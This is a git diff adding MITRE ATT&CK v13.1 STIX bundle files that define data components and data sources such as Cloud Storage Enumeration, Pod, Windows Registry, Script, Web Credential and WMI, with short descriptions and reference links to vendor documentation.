diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fcc4811f-9cc8-4db5-8097-4d8242a380de.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fcc4811f-9cc8-4db5-8097-4d8242a380de.json
new file mode 100644
index 0000000000000000000000000000000000000000..a9482c6c5c0a814d1a18a1c781c4a6425f782428
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--fcc4811f-9cc8-4db5-8097-4d8242a380de.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--18472ef8-a10a-4802-bd31-cac112f5aef1",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--fcc4811f-9cc8-4db5-8097-4d8242a380de",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.272Z",
+ "name": "Cloud Storage Enumeration",
+ "description": "An extracted list of cloud storage infrastructure (ex: AWS S3 ListBuckets or ListObjects)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--2ce537a2-3b30-4374-9397-31d6460ec0bc",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428.json
new file mode 100644
index 0000000000000000000000000000000000000000..ef227bca6494a2f56e89ee87f8d0628007be5a44
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--31196771-ea20-465b-aaf0-4e410eec51d3",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.271Z",
+ "name": "Web Credential Usage",
+ "description": "An attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff9b665a-598b-4bcb-8b2a-a87566aa1256.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff9b665a-598b-4bcb-8b2a-a87566aa1256.json
new file mode 100644
index 0000000000000000000000000000000000000000..a7d1b9f10340313f7764f0ce613f2da21a563c1b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ff9b665a-598b-4bcb-8b2a-a87566aa1256.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--9c60168a-b074-4499-a603-453f977bc6fc",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--ff9b665a-598b-4bcb-8b2a-a87566aa1256",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.275Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.275Z",
+ "name": "Domain Registration",
+ "description": "Information about domain name assignments and other domain metadata (ex: WHOIS)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ffd73905-2e51-4f2d-8549-e72fb0eb6c38.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ffd73905-2e51-4f2d-8549-e72fb0eb6c38.json
new file mode 100644
index 0000000000000000000000000000000000000000..59440fa06f9abda50a9510b5499ae64c2e029587
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-component/x-mitre-data-component--ffd73905-2e51-4f2d-8549-e72fb0eb6c38.json
@@ -0,0 +1,23 @@
+{
+ "type": "bundle",
+ "id": "bundle--e65d3aa0-08c0-49bc-8e2f-d7b57aa839b5",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-component--ffd73905-2e51-4f2d-8549-e72fb0eb6c38",
+ "type": "x-mitre-data-component",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "modified": "2021-10-20T15:05:19.273Z",
+ "name": "Snapshot Enumeration",
+ "description": "An extracted list of snapshops within a cloud environment (ex: AWS describe-snapshots)",
+ "x_mitre_data_source_ref": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf.json
new file mode 100644
index 0000000000000000000000000000000000000000..9f0d13a4b827c21b680fcc9cb93fee430b4ce25f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf.json
@@ -0,0 +1,51 @@
+{
+ "type": "bundle",
+ "id": "bundle--a1cdd805-22b9-4886-83f2-315d7e12af6b",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Containers"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Container"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0014",
+ "external_id": "DS0014"
+ },
+ {
+ "source_name": "Kube Kubectl",
+ "description": "kubernetes. (n.d.). kubectl. Retrieved October 13, 2021.",
+ "url": "https://kubernetes.io/docs/reference/kubectl/kubectl/"
+ },
+ {
+ "source_name": "Kube Pod",
+ "description": "kubenetes. (n.d.). Pod v1 core. Retrieved October 13, 2021.",
+ "url": "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core"
+ }
+ ],
+ "modified": "2021-11-10T09:30:48.697Z",
+ "name": "Pod",
+ "description": "A single unit of shared resources within a cluster, comprised of one or more containers(Citation: Kube Kubectl)(Citation: Kube Pod)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967.json
new file mode 100644
index 0000000000000000000000000000000000000000..fae7371666c77336966d87dff0036fa548e7b94c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967.json
@@ -0,0 +1,46 @@
+{
+ "type": "bundle",
+ "id": "bundle--b957446b-551e-48b5-a937-d0638bf1a11d",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Containers"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Container"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--072ec5a7-00ba-466f-9057-69751a22a967",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.274Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0032",
+ "external_id": "DS0032"
+ },
+ {
+ "source_name": "Docker Docs Container",
+ "description": "docker docs. (n.d.). Containers. Retrieved October 13, 2021.",
+ "url": "https://docs.docker.com/engine/api/v1.41/#tag/Container"
+ }
+ ],
+ "modified": "2021-11-10T09:30:48.694Z",
+ "name": "Container",
+ "description": "A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another(Citation: Docker Docs Container)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json
new file mode 100644
index 0000000000000000000000000000000000000000..1054838015f48d04f38e34fb27525eb0b7fc3842
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6.json
@@ -0,0 +1,53 @@
+{
+ "type": "bundle",
+ "id": "bundle--eac872d1-e227-4b9d-abd4-b01198366267",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-12-07T19:50:43.993Z",
+ "name": "User Account",
+ "description": "A profile representing a user, device, service, or application used to authenticate and access resources",
+ "x_mitre_platforms": [
+ "Azure AD",
+ "Containers",
+ "Google Workspace",
+ "IaaS",
+ "Linux",
+ "Office 365",
+ "SaaS",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Cloud Control Plane",
+ "Container",
+ "Host"
+ ],
+ "type": "x-mitre-data-source",
+ "id": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0002",
+ "external_id": "DS0002"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json
new file mode 100644
index 0000000000000000000000000000000000000000..baab00723b5995f1955226c6cba601b952fe9706
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0.json
@@ -0,0 +1,44 @@
+{
+ "type": "bundle",
+ "id": "bundle--4d3048c4-e889-4705-b9fc-8068a2a90b74",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack",
+ "ics-attack"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0024",
+ "external_id": "DS0024"
+ },
+ {
+ "source_name": "Microsoft Registry",
+ "description": "Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry"
+ }
+ ],
+ "modified": "2022-05-11T14:00:00.188Z",
+ "name": "Windows Registry",
+ "description": "A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json
new file mode 100644
index 0000000000000000000000000000000000000000..14452c1c5d1dbd0630822e00ee97a56e65c39340
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e.json 
@@ -0,0 +1,58 @@
+{
+ "type": "bundle",
+ "id": "bundle--63ab1928-876f-468b-a9ab-46da0f9a1b3c",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-12-07T19:50:56.964Z",
+ "name": "Script",
+ "description": "A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "type": "x-mitre-data-source",
+ "id": "x-mitre-data-source--12c1e727-7fa4-49b6-af81-366ed2ce231e",
+ "created": "2021-10-20T15:05:19.272Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0012",
+ "external_id": "DS0012"
+ },
+ {
+ "source_name": "FireEye PowerShell Logging",
+ "description": "Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.",
+ "url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html"
+ },
+ {
+ "source_name": "Microsoft AMSI",
+ "description": "Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal"
+ },
+ {
+ "source_name": "Microsoft PowerShell Logging",
+ "description": "Microsoft. (2020, March 30). about_Logging_Windows. 
Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52.json
new file mode 100644
index 0000000000000000000000000000000000000000..b2b1735ca5a22d8868f507719900693b3642b67d
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52.json
@@ -0,0 +1,51 @@
+{
+ "type": "bundle",
+ "id": "bundle--33259539-7193-464e-bf8e-ef9f7fa8ed4f",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "IaaS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Cloud Control Plane"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0007",
+ "external_id": "DS0007"
+ },
+ {
+ "source_name": "Microsoft Image",
+ "description": "Microsoft. (2021, August 23). Create a managed image of a generalized VM in Azure. Retrieved October 13, 2021.",
+ "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource"
+ },
+ {
+ "source_name": "Amazon AMI",
+ "description": "Amazon. (n.d.). Amazon Machine Images (AMI). Retrieved October 13, 2021.",
+ "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html"
+ }
+ ],
+ "modified": "2021-11-10T09:30:48.696Z",
+ "name": "Image",
+ "description": "A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment(Citation: Microsoft Image)(Citation: Amazon AMI)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4.json
new file mode 100644
index 0000000000000000000000000000000000000000..6689d84a2ea76525ec6e409dc7a014e5df424c84
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4.json
@@ -0,0 +1,55 @@
+{
+ "type": "bundle",
+ "id": "bundle--9f3fa38e-8b88-4e56-ab94-e1eb1d1058f3",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Azure AD",
+ "Google Workspace",
+ "Linux",
+ "Office 365",
+ "SaaS",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_collection_layers": [
+ "Cloud Control Plane",
+ "Host"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0006",
+ "external_id": "DS0006"
+ },
+ {
+ "source_name": "Medium Authentication Tokens",
+ "description": "Hsu, S. (2018, June 30). Session vs Token Based Authentication. Retrieved September 29, 2021.",
+ "url": "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4"
+ },
+ {
+ "source_name": "Auth0 Access Tokens",
+ "description": "Auth0. (n.d.). Access Tokens. Retrieved September 29, 2021.",
+ "url": "https://auth0.com/docs/tokens/access-tokens"
+ }
+ ],
+ "modified": "2022-03-30T14:26:51.807Z",
+ "name": "Web Credential",
+ "description": "Credential material, such as session cookies or tokens, used to authenticate to web applications and services(Citation: Medium Authentication Tokens)(Citation: Auth0 Access Tokens)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c.json
new file mode 100644
index 0000000000000000000000000000000000000000..d8ed1f26ca4250a49b8e83aaf75cdf22f030ddb3
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c.json
@@ -0,0 +1,48 @@
+{
+ "type": "bundle",
+ "id": "bundle--562bf716-cba0-49f5-9f50-23fdd833cdb8",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.273Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0023",
+ "external_id": "DS0023"
+ },
+ {
+ "source_name": "Microsoft Named Pipes",
+ "description": "Microsoft. (2018, May 31). Named Pipes. Retrieved September 28, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes"
+ }
+ ],
+ "modified": "2022-03-30T14:26:51.806Z",
+ "name": "Named Pipe",
+ "description": "Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it(Citation: Microsoft Named Pipes)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923.json
new file mode 100644
index 0000000000000000000000000000000000000000..ee60694652bf113c238cb20994dc505a4d28d0f1
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923.json
@@ -0,0 +1,38 @@
+{
+ "type": "bundle",
+ "id": "bundle--9eff346c-3df1-404e-8e3b-35f89fec0a96",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "PRE"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_collection_layers": [
+ "OSINT"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.275Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0037",
+ "external_id": "DS0037"
+ }
+ ],
+ "modified": "2021-10-20T15:05:19.275Z",
+ "name": "Certificate",
+ "description": "A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6.json b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6.json
new file mode 100644
index 0000000000000000000000000000000000000000..363237ab294aa5dd948ea7c8e444609335fefd2f
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/x-mitre-data-source/x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6.json
@@ -0,0 +1,51 @@
+{
+ "type": "bundle",
+ "id": "bundle--bbe4d177-c650-4528-90c9-611c8ba21847",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Center for Threat-Informed Defense (CTID)"
+ ],
+ "x_mitre_collection_layers": [
+ "Host"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6",
+ "type": "x-mitre-data-source",
+ "created": "2021-10-20T15:05:19.271Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/datasources/DS0005",
+ "external_id": "DS0005"
+ },
+ {
+ "source_name": "Microsoft WMI System Classes",
+ "description": "Microsoft. (2018, May 31). WMI System Classes. Retrieved September 29, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes"
+ },
+ {
+ "source_name": "Microsoft WMI Architecture",
+ "description": "Microsoft. (2018, May 31). WMI Architecture. Retrieved September 29, 2021.",
+ "url": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture"
+ }
+ ],
+ "modified": "2021-11-10T09:30:48.699Z",
+ "name": "WMI",
+ "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers(Citation: Microsoft WMI System Classes)(Citation: Microsoft WMI Architecture)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
